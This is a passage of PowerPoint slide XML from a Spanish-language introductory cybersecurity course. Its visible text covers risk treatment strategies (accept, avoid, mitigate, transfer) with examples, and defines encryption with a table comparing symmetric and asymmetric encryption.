              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E618D14E-C5F6-C106-3B17-D4D72EF13DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096041" y="4699571"/>
            <a:ext cx="2046451" cy="8204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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transferirlo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectángulo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FCD0B2-4A17-D866-2453-5184384B09BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574928" y="2031341"/>
            <a:ext cx="3694038" cy="8283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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Se asume el riesgo teniendo en cuenta la probabilidad e impacto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectángulo 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E95CBD2A-F717-741B-9A91-A110D808B8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574928" y="2914236"/>
            <a:ext cx="3694038" cy="8283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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Evitar cualquier acción que tenga potencial de transformarse en un riesgo indeseado.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectángulo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B3398B-F3AA-9903-170B-C0F1B00065B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574928" y="3808740"/>
            <a:ext cx="3694038" cy="8283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Proceso para reducir y/o eliminar amenazas o riesgos potenciales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectángulo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5DC1F6-62F7-D187-6E36-B156900C56FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574928" y="4699571"/>
            <a:ext cx="3694038" cy="8283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Delegar la responsabilidad del riesgo transfiriéndolo. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectángulo 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63432CE2-0220-5469-B81A-3BBA63181D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342187" y="1585644"/>
            <a:ext cx="3694038" cy="39803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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ejemplos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectángulo 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9E77DA-E6EE-EA4F-0002-1CDC8D04B1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342187" y="2024820"/>
            <a:ext cx="3694038" cy="828372"/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Riesgo por debajo del umbral aceptable o con probabilidad de ocurrencia muy baja.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectángulo 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52AAF271-6C29-6BF9-6A87-A1994D7801F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342187" y="2914236"/>
            <a:ext cx="3694038" cy="828372"/>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Eliminar la actividad que lo produce o sustituir el activo por otro que no se vea afectado.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectángulo 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF162588-1D51-EBD4-556B-26CAF8D44E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342187" y="3811713"/>
            <a:ext cx="3694038" cy="828372"/>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Implementar controles de seguridad o medidas adecuadas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectángulo 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E070583-21BC-877A-613C-84AC6E2B9C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342187" y="4704572"/>
            <a:ext cx="3694038" cy="828372"/>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Contratar un seguro, subcontratar un servicio, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Flecha: a la derecha 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB9AB549-DABE-6A95-4097-80466651BC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733161" y="2334456"/>
            <a:ext cx="876300" cy="264114"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Flecha: a la derecha 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1BF9BA-F627-D59C-66D5-3C23B0A158DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733161" y="3223777"/>
            <a:ext cx="876300" cy="264114"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Flecha: a la derecha 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFE64F6-2457-7614-9904-4C3E64F2F8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731485" y="4137344"/>
            <a:ext cx="876300" cy="264114"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Flecha: a la derecha 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43824722-3FCE-4EA7-3063-5CA44A07DF6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731485" y="4984908"/>
            <a:ext cx="876300" cy="264114"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Imagen 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570B49A1-5B5E-3503-EA10-23EBBA0DD5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452" y="2145534"/>
            <a:ext cx="425977" cy="425977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Imagen 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CC98C3-C4DF-5094-B48C-8B0042248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9410" y="2336775"/>
            <a:ext cx="347961" cy="347961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Imagen 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD008EFD-8FF9-FDD9-9C0B-E6883232EF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357" y="3146090"/>
            <a:ext cx="425977" cy="425977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Imagen 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCAFA4A3-EF99-E108-525B-B1DC4B03E9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826" y="4030552"/>
            <a:ext cx="425977" cy="425977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Imagen 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB47A42-7D05-E2FA-C45E-94510A21E1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8300" y="4196357"/>
            <a:ext cx="359071" cy="359071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Imagen 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82928EDC-4639-AC2B-91DD-03617CB65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451" y="4888960"/>
            <a:ext cx="425977" cy="425977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Imagen 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A54864B4-5B80-EF42-3689-A4C0A4A5FB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6041" y="5059501"/>
            <a:ext cx="389763" cy="389763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Imagen 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25E44C0-BA9F-7045-9DD7-A406D23E7A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8427" y="3328667"/>
            <a:ext cx="358944" cy="358944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="CuadroTexto 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0F7A7E-959A-7499-DF6F-D5C35BC65C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="923366"/>
            <a:ext cx="8455440" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Estimación de probabilidad de que tengan lugar posibles impactos:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827B23FC-A933-871F-63BB-7613FA040F72}"/>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03728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244FD1FD-85C0-CC4E-F23F-D8175003B5A4}"/>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5926B5D3-74AD-6A40-5CBC-2F0910F32280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5384373"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1B89205-6759-3D03-4D68-B093DFF88016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5907024" y="2703486"/>
            <a:ext cx="6217920" cy="2062103"/>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3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONCEPTOS TÉCNICOS DE CIBERSEGURIDAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A22B842-8398-D78D-F5F3-8AD82A958959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D667C557-4FD9-6817-1FB9-28FB0B5482C8}"/>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279361" y="88094"/>
            <a:ext cx="2231136" cy="871728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377041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F380-232F-7B75-F52B-4EAC005565B1}"/>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2F1DD2B-D9B1-D43C-4DB0-03306A7F7212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6629287"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7C4E2FD-E4B3-CF0A-8A9B-4A853EC5FB16}"/>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Conceptos técnicos de Ciberseguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB8C831-34D1-6DE7-A30C-FED77CB253D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5" name="Rectángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A123B99-281C-940C-9E0B-652258B8ED85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="857439"/>
            <a:ext cx="9737666" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cifrar:</a:t>
            </a:r>
          </a:p>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Técnica para crear mensajes codificados usando procedimientos con el objetivo de proteger la información que se envía. El cifrado puede ser de dos tipos:</a:t>
            </a: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0700" lvl="1" indent="-339725"/>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="520700" lvl="1" indent="-339725"/>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CE9A87-53E1-44BF-DF6C-BD6D79475999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4390827"/>
            <a:ext cx="3701473" cy="1478764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Imagen 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3220AEE5-F2A6-8EB0-CB5C-B4CFFBEB8460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579178" y="4310443"/>
            <a:ext cx="3885557" cy="1549336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C37D0D-CF13-9207-BBD3-C2764A579227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9823571" y="4442974"/>
            <a:ext cx="2186960" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B060302020202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Cifrado simétrico </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B060302020202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asimétrico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Tabla 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00E3C43-AA3C-15C0-4C13-DCEABCB31CE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344569008"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1457621" y="1730759"/>
          <a:ext cx="8513728" cy="2659136"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4256864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="147184812"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4256864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1317158250"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="319694">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cifrado simétrico</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
